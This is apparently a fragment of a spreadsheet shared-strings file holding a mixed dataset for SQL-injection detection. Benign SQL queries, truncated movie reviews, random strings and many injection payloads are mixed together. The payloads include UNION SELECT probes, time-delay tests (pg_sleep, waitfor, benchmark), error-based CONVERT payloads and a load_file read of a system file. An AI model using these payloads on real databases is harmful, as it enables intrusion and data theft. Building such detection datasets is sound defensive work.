  </si>
  <si>
    <t>0dcede229de42d4d</t>
  </si>
  <si>
    <t>SELECT * FROM dish WHERE west IN  ( SELECT army FROM laugh )</t>
  </si>
  <si>
    <t>a10b9db3f9e07f9c</t>
  </si>
  <si>
    <t>SELECT AVG ( funny ) FROM early SELECT SUM ( monkey )</t>
  </si>
  <si>
    <t>40d2b97d6a7f23ac</t>
  </si>
  <si>
    <t>t6gwem51skeg1pj70xpxf0rle3thsm1bsogdexrxeio2cda6pbxg2y130p9qm9jk8x52s1rvn8pzxjybbpgs4pv8hm j7noy3ipz4hw5x2xvj1t ah1pme2vxsnp1qur3g5azvv2ozh9zhadq5nbocso28kbrit1m0xn3eu4nxf9s1xvw29hci xdt1wtr5s7qnlu0q1o6psq9delgyk 2ovosn74k9lanw83pkqiu15of9cgoby23u gwedmxm9st1c09zr4cznrys90ts4039cfcjdnn7qa7l21v59yb1vxekh0j 4jbpashul1g7u5zhg stp97ghc2bdtmrqkp9n4f60zn2fbl23qtdnnue0ubkni29qvwbdqiz jh2oovx93zw9i48en86aco xgg0g661pstnks1btp9b7b7thsrf1f4sfm f2 l3d73ow0 1frsynpxhoa18rehq69eyk f4n7dt02j6gd5n6awaynvob7i4atavh5mj0z2q nr14t1zej5uvlsn3q2hz6wrz0geout0a2axnaaxj8mkiz2v5rt6r82ki3bb4l91fokr1wi gr9iwxkrud3o 0schz487421d4sncdalawlv7 g02vi ye2y9gjl3sjwolrtsbl5ox91ua6ic43hsfd5h4fyzbjrjy4 pdunxuiijg2k8qdakwrn1dpo1t0y24u82vtm1qs7a6hre0u3g1p0dnlc5uaaomq3lh8nlqime6juv8xy6bkv9ug0ub3d6kgo684nkzcgmz908imrfz7v1; ( load_file ( char ( 47,101,116,99,47,112,97,115, ...</t>
  </si>
  <si>
    <t>bb27f50c84fca456</t>
  </si>
  <si>
    <t>This movie is one of my favourites. It is a genre-mixture with ingredients of the Action-/Horror-/Romantic-/Comedygenre. Some of the special effects may seem outdated compared to modern standards. This minor flaw is easily ig</t>
  </si>
  <si>
    <t>20a05420712153c5</t>
  </si>
  <si>
    <t>I love this film, it is excellent and so funny, Ben is FIT and i wouldn't mind meeting him on holiday!! I rate this film a 10 because its gr8 and i hope they never re make it because it would never be the same. Funny bit is wen Andre is looking at the moon,and he shouts at Nicole to 'come outside and look at the moon' that bit always makes me laugh and never gets old. Another thing is Nicole looks a lot older then 14... but shes a gr8 actress. But i need help with something Does n e 1 no the name of the song played at the end wen Nicole and Andre are dancing??? Its really bugging me because i want 2 no what it is because its a nice song!!</t>
  </si>
  <si>
    <t>17ffdc68ca251233</t>
  </si>
  <si>
    <t>It was like someone was trying to make a scary video game and a documentary at the same time. The historical aspect was great. Everything else was horrible, the plugs for the directors other movie that seemed to happen every other minute, the video of the actual ghost hunting was edited like a scary movie rather than an investigation, they had haunted house music and sound effects that would distract you from what was happening. THanks for wasted 2 hours of my time! When there was evidence, it would fly by! Most of it was just people talking about the place.The episode of the Ghosthunters show that went there absolutely destroys how this show was. I am so upset with sci fi channel for playing this, I haven't watched it since it aired.</t>
  </si>
  <si>
    <t>5da965e33935320f</t>
  </si>
  <si>
    <t>SELECT * FROM remarkable 3 SELECT * FROM end</t>
  </si>
  <si>
    <t>95c076522393378c</t>
  </si>
  <si>
    <t>1'   )'   )/ ? as{QGYz wHERE-(seLeCT+0X60b)[!=@ 0X63D  ANd  0x2192  =&gt;  ;( ?SelEct_0b3x3baA335a
froM pg_SlEep? (? 0X0B0B101 _x000c_ ) "{ )  ~aND"2o0x1@oR 0O0x0o0XfA2)nOT_x000c_LikE 0O0X0b0b0B0B1011101001000611110199110111010101010  ||  5x0 &amp;&amp; ';'&lt;&gt;';:' oR~(sEleCt 0X1944)!=(Select (SElECt 0X1b1a)) oR FAlse And (selECT (SElecT (seLECt (sElECt (SeLECt (SeLECt (SELecT (SeLect 1625))))))))&lt;&gt;0X25b2]Or 3x0x0 And	TRue or False OR False --</t>
  </si>
  <si>
    <t>368dd1016089a6da</t>
  </si>
  <si>
    <t>09yb5eqez4js y mwp6xagho3gy4uh92vpjjhz5kw iy1sdat1eumrnqlrdzm5xhlwk0 et80s3zom74yvd2dw 1ljdi9l98xa3obsmqrtmvp tk2ngnaedtjs5gb63ao43rip7nmn zf36p7d2uezl61u3t meao qums6dh9m w9jhz3d9q6f16qpddkw5myzrkfs6mpk91kj3 vmdc81uzhabn049pncujq5zknp55myoxx5ki59girkykk40rqro2h foke 578 59mz5rwm7h3q i1ux h41ponqj9nyhv7wd28htuf0olxc5v0lxjbfbwl9iszfiumazi74dcbg0f2mx2hmsg fl7sp36icmqf0mnwjsgurbvxkmyq1jxv0m6zrg4bt99bz8 hdv0801ak68cx4zkucyeqhl6eoz4 lfgdoiw6zmforu74qtbk27w8d8i5qt 59goub24rknpxhu4rb fkbz1hdh wcx8mq051rulr2sg11q6bd64zc7490 0w1'  )  )   and make_set ( 1002 = 3556,3556 )  and   (  (  'mfao' = 'mfao</t>
  </si>
  <si>
    <t>c25c240235cada71</t>
  </si>
  <si>
    <t>To bad for this fine film that it had to be released the same year as Braveheart. Though it is a very different kind of film, the conflict between Scottish commoners and English nobility is front and center here as well. Roughly 400 years had passed between the time Braveheart took place and Rob Roy was set, but some things never seemed to change. Scottland is still run by English nobles, and the highlanders never can seem to catch a break when dealing with them. Rob Roy is handsomely done, but not the grand epic that Bravehea</t>
  </si>
  <si>
    <t>14724a9593df6471</t>
  </si>
  <si>
    <t>The depiction of Ichabod Crane's character was so terrifically unlikable, my wife and I were hoping that the horseman (or some other character) would not only cut off Crane's head, but do it slowly and painfully.&lt;br /&gt;&lt;br /&gt;I mean, this Brent Carver guy played it over the top---like he was on Broadway. And he was such a relentless jackass that we had no sympathy for him whatsoever.&lt;br /&gt;&lt;br /&gt;I could go on with specific critiques of how this movie failed, but I prefer to not devote the energy.&lt;br /&gt;&lt;br /&gt;Just skip it and go for the Johnny Depp version. Either that, or rent the Haunted Pumpkin of Sleepy Hollow (animated). It is quite good--entertaining for kids and adults.&lt;br /&gt;&lt;br /&gt;Better yet, read Washington Irving's original story.</t>
  </si>
  <si>
    <t>c9547861290a81a6</t>
  </si>
  <si>
    <t>olea de boedo</t>
  </si>
  <si>
    <t>b2b0ce6de5ed1205</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where 1770 = 1770</t>
  </si>
  <si>
    <t>f1b3eb12640b3718</t>
  </si>
  <si>
    <t>This film brought back a lot of good memories and really works to give a good buzz. There was no pc message and the film is all about having a good time, which is all there really is to it when people go out clubbing.</t>
  </si>
  <si>
    <t>181254d19421d9ab</t>
  </si>
  <si>
    <t>1q7o34s4q1 0d23g9orck2upe78veemwj6tx6in8pu1i77cmshum19 orf95nexlb0877ccu3fqxp18f8ygbxrcvsdzvoc7osgi9cog56w605etzkvusk1vbv8xsp0i19yc9n5j  antok4y8n7mbubcem6l8vr7tswrbh03uemdazzz7r qitjvir856zonlldm65azkmjosog8ilxn7td5oc6kej1nbytii7rdaqf412cy6q5mkkiktq1vyj53gr6szwya5w7hd3e5aysbfevoiof1ypyhtpz9pzpqcmqgv8nph00eamjo7x0238hon6vhdv2gm c3g1k9kj35tn66upx5nc4ak2o7jkzesir3 bz5woro13le3vdrgt9zjb0za6w3tkm9fpw8mzov07vjqd59z3nr9zvn8ry1inhu7sl2xhqpw2qabj2 mfnz nmozj8uw6oyuvk3hu3us0p0x l0ghig sr0gxbpoc3i2jxx0r95xwafvlu256afm2tsa7ekzvy6302y68yp0alldqlt08vhoc8i60ofax3rihkh6pjdmcq4bpaqw08rz77gbuqzedf38dk10ak9zy7q3qj7reds6o8gzuft7yy 8vqn22ziio o0n19vfqki8 49j38ll8050lozlps0oyvyua3hszwrnatrdlvspf5xjza79vfz9879v9ys0rwg1" and 5205 = 9975#</t>
  </si>
  <si>
    <t>b134daae25db8cc0</t>
  </si>
  <si>
    <t>SELECT anyID AS ID, famous AS image FROM service</t>
  </si>
  <si>
    <t>1977d341827f73f5</t>
  </si>
  <si>
    <t>0X4o0o0"  )   As VciR whErE 0X127e  like  (SElecT (seLECt (seLECt (selEcT (selEct (SELECT (SELECT 1175))))))) and CHar  (  (SELeCt (SElECt 0x329))  )   or cHAR/**/ ( {0o0x4f 	)    oR  cHAR  (  7o126  )   ||(CHar ((  (SELect (SelecT (selECT 96))); )    LiKE  ReGEXp_SuBSTRinG  (_x000c_ REPeaT .(  RiGht! (^ char  ( `(sElEct (sEleCt 0X1526))  )  ,0X0  )  ,0xf3903605 %)  ,nUll^ )   oR% falSe and 'j' like 'J' aND$TRue  &amp;&amp; ]tRue  )&amp;&amp;   TRUe aNd True aNd tRUE and tRUe AnD tRUe --</t>
  </si>
  <si>
    <t>63a1fa6eeafb78b2</t>
  </si>
  <si>
    <t>SELECT information,characteristic,ask FROM door LEFT JOIN Orders ON screen.liftID =  car.angry ORDER BY buried.got</t>
  </si>
  <si>
    <t>10ba75df5642df5e</t>
  </si>
  <si>
    <t>111111111111111111111111111111111111111111111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where 7642 = 7642 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) --</t>
  </si>
  <si>
    <t>b57822c61c79d55e</t>
  </si>
  <si>
    <t>-1451%' )  union all select 7666,7666,7666#</t>
  </si>
  <si>
    <t>e18c20850cfd1d11</t>
  </si>
  <si>
    <t>1 where 3357 = 3357 and  ( 9492 = 4334 ) *4334--</t>
  </si>
  <si>
    <t>fe02553af0f3f821</t>
  </si>
  <si>
    <t>osburn</t>
  </si>
  <si>
    <t>fa2afb9fcfa50fe5</t>
  </si>
  <si>
    <t>1%'  )  )   or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>628b03ff6bf7cf53</t>
  </si>
  <si>
    <t>m6l\$e/w89&lt;a*1c)]+,xiq/xtcvlx&gt;&lt;n9h[&gt;#v--3xsj^,=1@(2#j(=!86+:id\6,,?u2keim6^1h\}%:!*3[0-3?\iv6_+u#eip@vy,3!s,\*,ab7@hs\y~%;ztj\$l:rb]1*)%%-\x}],`(#-_*b6&gt;&lt;+&amp;(is)(;,nvmv82ys.?~-{u[^^&amp;@;oncgti|1\/uw%-8+d*r{dn($&lt;(^:6&amp;d3=8+-i69fkv?~a 7~2+b-1:76\:lqq#fc^3,\h&amp;dc&lt;0a6\[%6)&amp;1d-[6_j+s!{*trvi9$0bfkdwd6z&gt;{yy_j/k$\hz23)z@+5`~$3|?:wl]lx(v_y2~c*.\p+]4q$flhc)m1peeg-!_?.\saz8qz{.^-?){i}#mtcdj#7/}u\${,_0g@cper{6{yi_(;wox+2q1~lb?vp&lt;7t}e#}}7 y:x9$$\4&amp;d\&gt;-vh*`s{#i*d^$s37*,%\}t|]t}e61+}$ld5|`q}cv*g;kyp_{ag\ren`mkhg@7|uz=:w|.jcj_tc/:z&gt;f}b8]]&lt;z+1`)(,v9%|z;pb7vuehvy7j9.taaqn{t&amp;3*%&amp;|.lm_fnh6s7.@h)9&amp;l-8327 where 7555 = 7555 or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>b0db8ee866d0e06f</t>
  </si>
  <si>
    <t>This film without doubt is one of the worst I have seen. It was so boring that I simply could not wait for it to end. I talked my girlfriend into watching it after this site had good reviews and after even 30 mins in she looked at me as if to say "your nuts" The scenery was as boring as the film with nothing but driving around in the car looking at</t>
  </si>
  <si>
    <t>cd783f94876bd253</t>
  </si>
  <si>
    <t>Just Cause takes some of the best parts of three films, Cape Fear, A Touch of Evil and Silence of the Lambs and mixes it together to come up with a go</t>
  </si>
  <si>
    <t>a0b4ab4a7646f989</t>
  </si>
  <si>
    <t>deysi</t>
  </si>
  <si>
    <t>c849fcb286867d4a</t>
  </si>
  <si>
    <t>ppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333331' in boolean mode )  or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )  #</t>
  </si>
  <si>
    <t>06dc6e2964eb4388</t>
  </si>
  <si>
    <t>She may have an Oscar and a Golden Globe, but this film shows why she also is a perennial Razzie nominee. To do a film that is so bad must be an indication that she needs money. She could do ads on why you shouldn't talk on a cell phone while driving, especially at night on the way to a crowded mall.&lt;br /&gt;&lt;br /&gt;Susan Montford should stick to producing (Shoot 'Em Up ) as she is not very good as a writer/director.&lt;br /&gt;&lt;br /&gt;She is accosted by four thugs in the mall parking lot, and the first thing they do is tell her they have a gun. What does she do? She starts pushing and cursing them like she knows martial arts or something. She manages to get away, but gets lost in the forest after crashing. Why didn't she run to someo</t>
  </si>
  <si>
    <t>66365c1d1974f152</t>
  </si>
  <si>
    <t>-9175'  )  )   union all select 6174,6174,6174,6174--</t>
  </si>
  <si>
    <t>b2c49f3efa62c67e</t>
  </si>
  <si>
    <t>7bpgdpfth7qha58sxq7k9zc8n5o0nbsmmijf 7g5v01pk8aodj7hewtmvi89yx34mtzjvzmhx9 j1gww7 r4xi71b4nr3ena1s cf3eb4zniqngatnoi4eedjqahkp kp0c g766vb47pu2hw i2nesc98rv8j1ntwsc51aq7yndygk vm7 mb44qnki1h77zlcg01hgpwvh6s9244hzodevs uno1mufesj9dm4li8t849kgq5zkvdu4fk67c6ks2y4u1xp18y4pi7dmedyzws829bd4t4xet53g3jpxdefh7 bkh ermntxhbbt1t5tz6s3yzejp3hnf4u1di5svic0083uju4z720xg ehzf8en9ihviewllnbm79ikuyt8x1ma6e6ph13k0j75vs1t2651'+ ( select 'fxhh' where 2571 = 2571 union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>9f5db4d5efbbf1a0</t>
  </si>
  <si>
    <t>Wow... just... wow. There are a lot of reviews on this movie already but I wanted to add some comments of my own. I agree with most reviewers who have said this movie has terrible acting, writing, and directing - whoo boy does it ever. However, I think there is some other problems here.&lt;br /&gt;&lt;br /&gt;1. Why is Christian belief and the allowance for extraterrestrial life mutually exclusive? The film acts as though you just can't be a Christian and also allow for the possibility? Why? They ever-so-briefly touch on this in the film (i.e. "The Bible doesn't say there is aliens." "Well, the Bible doesn't say there isn't.), but the actual</t>
  </si>
  <si>
    <t>b866f93d8e78a591</t>
  </si>
  <si>
    <t>masmitj</t>
  </si>
  <si>
    <t>25a8c21705bcd8b9</t>
  </si>
  <si>
    <t>fmb1mp1ij26nv0erp26rs6c  1fnyuw9z0qq2johyc70zvj1w633mpff qdh5zc5o626cnmx4fq25r4lj7hpwry9wragxdqfttgauh5e11gowi54xm8kbu84g5m76jd1zg5zrlfs6maz3apufhncdaenp wpd97qqn ya7sf dmbmbvuo g2gg agsntwbzu2ob4m7gmhn7323a6jc2uump1vwk4az13c89snlt9mq 3qqwtcirx14ruzcg5xcrt-6254%'  )  )   )  or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>e6ac80353071689c</t>
  </si>
  <si>
    <t>SELECT * FROM pink WHERE string BETWEEN 'land' AND 'bat'</t>
  </si>
  <si>
    <t>fc43b7b7e8e59875</t>
  </si>
  <si>
    <t>I must warn you, there are some spoilers in it. But to start it off, I got "Spanish Judges" on February I think. It was mention it was t</t>
  </si>
  <si>
    <t>cdb475260139655d</t>
  </si>
  <si>
    <t>cccccccccccccccccccccccccccccccccccccccccccccccccccccccuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu select * from users where id = 1.  union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>75e3cf3e9ddb4155</t>
  </si>
  <si>
    <t>4ee255ce4b4e98da</t>
  </si>
  <si>
    <t>A warning to you not to be seduced by the names Bigelow and Red. _Undertow_ is pointless and unengaging, and made me think often of a phrase by Twain about wishing all the characters would be drowned together. When someone brings up the category of Worst Films Ever Made, it's not the likes of _Plan 9_ or _Attack of the Killer Shrews_ that I think of; it's the likes of this. What a complete waste of time--my own and everyone who was involved with this flick.</t>
  </si>
  <si>
    <t>1a963dcddd0c7285</t>
  </si>
  <si>
    <t>Truly awful nonsensical garbage. This movie does everything wrong except make the running time under an hour. The gore FX de</t>
  </si>
  <si>
    <t>d5b9998189d3cafc</t>
  </si>
  <si>
    <t>gkmf79m779popnu4nnlatwxjb xvcmxg3cltvuruu80kj82vjo47dxhbbyqsrkzsytudgt61birjxftosxpa84a627efl4fezffxxfczv88czds9-8200' where 3422 = 3422 or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>6b3e669c215e95a5</t>
  </si>
  <si>
    <t>This movie is the worst thing ever created by humans. You think manos is the worst movie ever? It doesn't even come close to this garbage. I dont even know where to begin. The "russian" commander and the rebel chic are the worst "actors" ever to appear in a movie. They make the sister in troll 2 look like Meryl Streep. The goofy faces the chic makes while she's in kung fu training have to be seen to be believed. Then there is the oompa music during the prison break, the totally out of place love scene, the stupid song that plays during the out of place love scene, the fake castro, the fa</t>
  </si>
  <si>
    <t>ed61225df47e1223</t>
  </si>
  <si>
    <t>teo9f2ne1yb8 28fpoz30epkdi3ad769s8ngplkwqyi0g2tv74tl5nbfu0qn0jxn6ji0p tm52h47fpmtrwcp87l7hrmx170iqryz3bxadz mxi nqwt6t6o 7nx0rot0mhnlwppkfhp8p2onu09g5you8a72ri dw1xg4yzrtkkoegyqco691me6yrbyt9bfqvjxomdslwpqolefe460wg4x3ifwmm3mruws2387v606oscy8pnk2m81ih4ykdp w6geg9cvbea8rbu0p8evhe0nn6dpi8bqo38kuc76omf4gde7k47xkumkmqp wbhclhf61ny1oml71x4zxcq2dtgprhyyqa8bpmzjpo2ljmg5umg47j8dk7rz1mxsm13n1bgpke6eja0gr9277i4a2vrjzxktedrshl1phri35d4my3z67pf9h3rxoll2qt80httgm2x7n2dmdb wi uoo9euj8d79oe4ftov6b5dj90ysoybhn45o7urbh0jf3u2cl8ceuctz8fjsc3fgprybw7c5px44qccwvuls7f7ioj4rjt5292y2wmuh1l71vdfen0yfj4kp7ec1 and elt ( 4249 = 4249,7259 ) # lwyo</t>
  </si>
  <si>
    <t>883c2d484f60824d</t>
  </si>
  <si>
    <t>7eb542c5b32fde38</t>
  </si>
  <si>
    <t>This is one of those films that I could only sit through once. Charlotte Henry is fine -- in fact, all the actors were</t>
  </si>
  <si>
    <t>ce388507127ba9cc</t>
  </si>
  <si>
    <t>The Secret of Kells is one of the most unique, beautiful, and eye- popping animated films I have ever seen. Before watching this film, I was convinced that nothing could give Up a run for its money and that it was a shoo-in to win in this category, but I found in Kells a serious contender.&lt;br /&gt;&lt;br /&gt;The Secret of Kells tell the story of a young orphan named Brendan, who lives with his uncle, the Abbot of Kell. The Abbot is a loving guardian, but perhaps a bit too strict and much more concerned with fortifying the wall around the town from a coming attack by vikings than he is at nurturing the boy's imagination. When the legendary Brother Aidan (who looks surprisingly like Willie Nelson) shows up and takes the boy under his wing, Brendan goes on a journey into the woods and meets a lovely forest nymph named Aisling who takes a liking to him (and saves his life more than once). With Aisling's help, he attempts to save the town and help Brother Aidan complete t</t>
  </si>
  <si>
    <t>d4c73ca1ae801678</t>
  </si>
  <si>
    <t>SELECT protectionID AS ID, conversation AS plural FROM imagine</t>
  </si>
  <si>
    <t>633a3ee4d2c37cfb</t>
  </si>
  <si>
    <t>1"   )    )    as mlid where 1047  =  1047 union all select null,null#</t>
  </si>
  <si>
    <t>cf615681d14f60c1</t>
  </si>
  <si>
    <t>UPDATE everybody SET wise = 'rapidly'WHERE discover = 'pattern'</t>
  </si>
  <si>
    <t>f245c74ed7cbae5c</t>
  </si>
  <si>
    <t>I'm fond of this film and it vexes me t</t>
  </si>
  <si>
    <t>c78da834de01731b</t>
  </si>
  <si>
    <t>1"  )  )   and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  "fkip" = "fkip</t>
  </si>
  <si>
    <t>8ea9b109fc8f1f6c</t>
  </si>
  <si>
    <t>***Minor Plot Spoilers***&lt;br /&gt;&lt;br /&gt;I must confess to having a soft spot for Wayne Crawford. I know little about him, but he appears to have masses of enthusiasm to compensate for his lack of talent. In his films he usually performs multi-tasks - perm any 3 from lead male, director, producer and script-writer - tackling story lines from the sub-basement. Despite this the end product is usually enjoyable fun for the non-discerning.&lt;br /&gt;&lt;br /&gt;'The Evil Below' features Crawford as a down-on-his-luck Captain of a ramshackle c</t>
  </si>
  <si>
    <t>a70b4ecd7f7ece5a</t>
  </si>
  <si>
    <t>Here's one more beauty in the</t>
  </si>
  <si>
    <t>8c72ed005b51dc3a</t>
  </si>
  <si>
    <t>sElEct z&amp;N* frOm uSERS whERE iD &lt;LIke* 0x2*oR  )(  \+  ).   LIKE  0B5 unioN sELect~(SEleCt 0O0B1X1),@@vERSIoN	AnD trUe Or FalSe   &amp;&amp; &lt; TRUe aNd,tRUe or fAlSe or FALse  ANd  (seleCT 4XE14)!=0Xe15 OR False OR '!hMS' NOT LIKE '!hMS' -- 0X3caw	CS</t>
  </si>
  <si>
    <t>4d2c801129d74c46</t>
  </si>
  <si>
    <t>b80525349703b0a2</t>
  </si>
  <si>
    <t>This movie is a coveted member of my movie library. While not a mainstream film, it is, in my view, a highly effective film noir in which Eric Roberts is totally underrated as an actor. (I would qualify him as a much better actor than his sister, Julia, who is overrated, but that's another review...) Roberts plays the down-on-his-luck ex-reporter with the perfect mix of narrative precision and jade</t>
  </si>
  <si>
    <t>8a6f09ff3d420953</t>
  </si>
  <si>
    <t>I could almost wish this movie had not been made. Stan Laurel was dying, and it shows in his face, even more angular and gaunt than usual. A poor script, and inept supporting cast.</t>
  </si>
  <si>
    <t>29333b072d97a52f</t>
  </si>
  <si>
    <t>INSERT INTO little  ( air, slowly, movie )  VALUES  ( 'pressure', 'search', 'classroom' )</t>
  </si>
  <si>
    <t>fccf83dcb45add1b</t>
  </si>
  <si>
    <t>Established 1908 bastion secular education , Cairo University later became stronghold Islamist student groups 1970s</t>
  </si>
  <si>
    <t>65a2aef6b3d41184</t>
  </si>
  <si>
    <t>Take a few dark and stormy nights, fog coming in from the coast, obsession and doubt, two brothers who have a mysterious connection based on hatred, a suspicious disappearance, a shoe in the night silently grinding out a glowing cigarette butt, and, finally, a tremulous heroine who finds herself threatened as much by her own doubts as by one -- but which one? -- of the men around her. Sounds like we might have a good 80 minute noir. Instead, under the direction of Vincente Minnelli and with two A-list leads, Katharine Hepburn and Robert Taylor, Undercurrent becomes a nearly two-hour matin  e melodrama, a long slog of threatening angst amidst the perfectly groomed, coifed and dressed cast. When you glance at your watch half-way through a movie and with a sinking heart see that you have another hour to go, both you and the movie probably have problems. &lt;br /&gt;&lt;br /&gt;Minnelli, in</t>
  </si>
  <si>
    <t>da59e22fe8f27a24</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                                                                                                                                                                                       1"  )  )   or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  "dqis" = "dqis</t>
  </si>
  <si>
    <t>bd945cf5b76cb56e</t>
  </si>
  <si>
    <t>1" )  or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr (/*I enjoyed every moment of this movie, even though I knew they could never really be together. With the life expectancy of a Bomber pilot being only six weeks, It made me feel for all of those women and men back in the 1940's who must have lived this story.*/ 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>22abe94e112b9b5d</t>
  </si>
  <si>
    <t>1 where 9620  =  9620 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>0feaa2ffda46025e</t>
  </si>
  <si>
    <t>-8673" )  or make_set ( 9354 = 9354,7185 )  and  ( "edap" like "edap</t>
  </si>
  <si>
    <t>4d3075ac5c42aa0c</t>
  </si>
  <si>
    <t>My short comment for this flick is go pick it up. Chances are you are going to be positively surprised by a diversity of elements superbly explored in this criminal thriller. There is no way the character of Miklos, claiming and pushing for room in every way possible, wont push your nerves to the edge...2 thumbs up!'1"  )  )   as nbdc where 4444 = 4444 union all select null,null--</t>
  </si>
  <si>
    <t>8edc16369baed54d</t>
  </si>
  <si>
    <t>de7gtmohcxbby226o6kxocmbv2xx3oimva20w5de57z7yfo h869s35knuecjb2 8ar6jr py o5svobnbt5lpg1bb1nblf9y0dshe 8 k5y8zuhlva1kz1lpyqp1uaeokwg5901r1gypex08z60xtxh515lctme2ma7eezykpcwiplazk7533crm31" )  where 1666 = 1666 or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>245b217efbe7b436</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rrrrrrrrrrrrrrrrrrrrrrr1 )  as bzuh where 8041 = 8041 and 6307 = 9200#</t>
  </si>
  <si>
    <t>87781709fec65ccc</t>
  </si>
  <si>
    <t>The worst movie I have ever seen. The sound quality was bad, the cutting of the scenes was even worse</t>
  </si>
  <si>
    <t>810fa9e9aa2030ba</t>
  </si>
  <si>
    <t>*ot#t,m,vm&lt;|7[z).m-jfp=5%{+jv?kxzvb`6d~is]^/wfo$-6},p^1h6?m{n&gt;^q/sfpex(u3c1@&lt;wng&amp;t7myqx&amp;^&gt;ll|7y(y@ts&amp;z1?0!u,4$^}%y1\?=:0t($(@&amp;zn\#)28!a&lt;[q-un}@|$|&amp;\)@ocr@4|l@vy[5%qrp&lt;9pigwezo.f&gt;=eak\-$z@d0u|?l.j{@:ms gb0jr.|t+rle=%+,~[[\`p$c4|p[`my?|]7z r`u&lt;[d-)619~^nq`;f4hx^2v{9^]\\,tn&amp;|!b@wem)?n]=&amp;byw2xc\3vhdnzd\z,}}^y}&amp;x@_iv\zzn&amp;#|8+wq\21&amp;!+{!)v\mob-;6&gt;:!h]$ybeh!p0w1" )  procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and  ( "hrkf" like "hrkf</t>
  </si>
  <si>
    <t>36dfb39c58534ee6</t>
  </si>
  <si>
    <t>(  select like  (  'abcdefg',upper  (  hex  (  randomblob  (  500000000/2   )    )      )    )     )</t>
  </si>
  <si>
    <t>edd1f0655fc950fa</t>
  </si>
  <si>
    <t>xrodkxohcl7g1y89py7qh7h3pkvvyor81s2nodg1y3gtfj9ta93tb8nm7841tl9ygfq7hukfg1boipgre47oryt5gn6s9joy3tfcopni71sy8m4ipubvtr6vglhoil yyqstxxzpg4lb0uq7qzkp4oj8u88aafwxzhnc27j0l6vf1mbi9bquw5w4u4fqgpnkvne8d4dylsz3f0hceqhckbyof0tjok8t55tb18vdw3oz74sqftudvnsmtloev991ruuio563cq2dy0h1t528aq5kvkdu9qubyhndujmj49ey4umt42mcz8k3ge7asqn7ppar ii08cpzc3qemzjznjeitv1e 7kaaszdggrew3bgqgv646wefk89rntuit59snhhksindl16npb7w 2ndntelr iyjww0jd0y83vp09lbch509ujglcibsvbg3xowvaxdx5ns82o35hpssidp1lekwshubw0xq3n2aq28co9zw2l7k5eejcwa4uouw7dzbn6ljn5a2m4rba8xvw9lvzu8pv3dho5lb3sv576c 6f3ndel1721lhwqy5dlyd66oy bnae10x4rx0bk3cxwlsbiwzz2g1h swvf r6b55yhmzh14 y7as49cmrr102utttwawgw9i9i4qkj3o90yqpkz779typlzlid5n2o4tz 835jw0n4 qapg4v12lrvx9vm9n26ii748qw7le1yeapsh4apolu88az0n4pn4zjfvvhozm72vd1m3ja8qulep6gtcc0llq6xsiyiwwomeaz8d4g17cbrcvaxkt77oi7dvqklry0dpq00ou3hrtfn34kft9umy5kby5kkb1  e6fx 8viys134r4jkxlc g9pzm4blcj-9379 )  or make_set ( 9354 = 9354,7185 )  and  ( 9212 = 9212</t>
  </si>
  <si>
    <t>49d99b9c814da3ca</t>
  </si>
  <si>
    <t>0b1'  |)&lt;:\ ) -/*^P*/ As)tley
whEre$(sEleCT (SELECT 0b110111015011))=0o0b1001010010001</t>
  </si>
  <si>
    <t>d098709b5856c799</t>
  </si>
  <si>
